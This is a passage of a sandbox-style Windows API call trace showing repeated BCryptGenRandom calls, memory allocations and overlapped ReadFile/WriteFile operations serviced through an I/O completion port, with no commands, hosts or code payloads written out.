(_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.956] free (_Block=0x1fa91d0) [0200.956] free (_Block=0x1fa2ed8) [0200.956] free (_Block=0x1fa90b8) [0200.956] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0200.956] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0200.972] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.972] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0200.972] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.973] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0200.973] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.973] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.973] free (_Block=0x3e305b8) [0200.973] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.973] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.973] free (_Block=0x1fa91d0) [0200.973] free (_Block=0x1fa2ed8) [0200.973] free (_Block=0x1fa90b8) [0200.973] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0200.974] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0200.980] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x680, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0200.980] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0200.993] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.994] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0200.994] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.994] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0200.995] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.995] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.995] free (_Block=0x3e305b8) [0200.995] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.995] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.995] free (_Block=0x1fa91d0) [0200.995] free (_Block=0x1fa2ed8) [0200.995] free (_Block=0x1fa90b8) [0200.995] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0200.996] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0201.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.009] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0201.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.010] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0201.010] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0201.010] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0201.010] free (_Block=0x3e305b8) [0201.010] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0201.010] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0201.010] free (_Block=0x1fa91d0) [0201.010] free (_Block=0x1fa2ed8) [0201.010] free (_Block=0x1fa90b8) [0201.011] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0201.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0201.011] CloseHandle (hObject=0x3cc) returned 1 [0201.011] free (_Block=0x3f70048) [0201.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0201.012] CloseHandle (hObject=0x2a8) returned 1 [0201.012] free (_Block=0x3e70008) [0201.012] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0201.027] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.028] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0201.028] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.028] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0201.028] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0201.029] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0201.029] free (_Block=0x3e305b8) [0201.029] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0201.029] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0201.029] free (_Block=0x1fa91d0) [0201.029] free (_Block=0x1fa2ed8) [0201.029] free (_Block=0x1fa90b8) [0201.029] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0201.029] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0201.030] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xdf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0201.030] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0201.097] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x884, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0201.097] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0201.098] CloseHandle (hObject=0x308) returned 1 [0201.098] free (_Block=0x3df0008) [0201.098] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0201.115] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.116] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0201.116] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.116] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0201.117] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0201.117] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0201.117] free (_Block=0x3e305b8) [0201.117] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0201.117] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0201.117] free (_Block=0x1fa91d0) [0201.117] free (_Block=0x1fa2ed8) [0201.117] free (_Block=0x1fa90b8) [0201.117] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0201.117] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0201.118] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0201.118] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0201.133] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x724, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0201.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0201.133] CloseHandle (hObject=0x308) returned 1 [0201.133] free (_Block=0x3df0008) [0201.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0201.148] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.149] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0201.149] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.149] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0201.150] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0201.150] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0201.150] free (_Block=0x3e305b8) [0201.150] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0201.150] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0201.150] free (_Block=0x1fa91d0) [0201.150] free (_Block=0x1fa2ed8) [0201.150] free (_Block=0x1fa90b8) [0201.150] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0201.150] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0201.161] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.166] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0201.166] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.167] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0201.167] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0201.167] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0201.167] free (_Block=0x3e305b8) [0201.167] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0201.167] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0201.168] free (_Block=0x1fa91d0) [0201.168] free (_Block=0x1fa2ed8) [0201.168] free (_Block=0x1fa90b8) [0201.168] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.168] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0201.173] CloseHandle (hObject=0x2a8) returned 1 [0201.173] free (_Block=0x1ff1e60) [0201.173] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0201.173] CloseHandle (hObject=0x308) returned 1 [0201.173] free (_Block=0x3df0008) [0201.173] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0201.187] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.187] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0201.187] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.188] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0201.188] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0201.188] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0201.188] free (_Block=0x3e305b8) [0201.188] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0201.188] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0201.189] free (_Block=0x1fa91d0) [0201.189] free (_Block=0x1fa2ed8) [0201.189] free (_Block=0x1fa90b8) [0201.189] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0201.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0201.189] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0201.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0201.242] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x754, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0201.242] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0201.245] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x73c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0201.245] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.046] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3f, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0204.046] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.046] CloseHandle (hObject=0x3cc) returned 1 [0204.046] free (_Block=0x1ff1e60) [0204.046] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.051] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.052] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0204.052] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.052] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0204.052] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.052] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.052] free (_Block=0x3e305b8) [0204.052] calloc (_Count=0x41, _Size=0x4) returned 0x1fa92e8 [0204.052] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.053] free (_Block=0x1fa92e8) [0204.053] free (_Block=0x1fa2ed8) [0204.053] free (_Block=0x1fa91d0) [0204.053] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0204.053] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.053] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0204.053] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.061] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0204.061] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.061] CloseHandle (hObject=0x3cc) returned 1 [0204.061] free (_Block=0x1ff1e60) [0204.061] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.067] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.067] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0204.068] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.068] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0204.068] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.068] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.068] free (_Block=0x3e305b8) [0204.068] calloc (_Count=0x41, _Size=0x4) returned 0x1fa92e8 [0204.068] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.068] free (_Block=0x1fa92e8) [0204.068] free (_Block=0x1fa2ed8) [0204.068] free (_Block=0x1fa91d0) [0204.069] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, 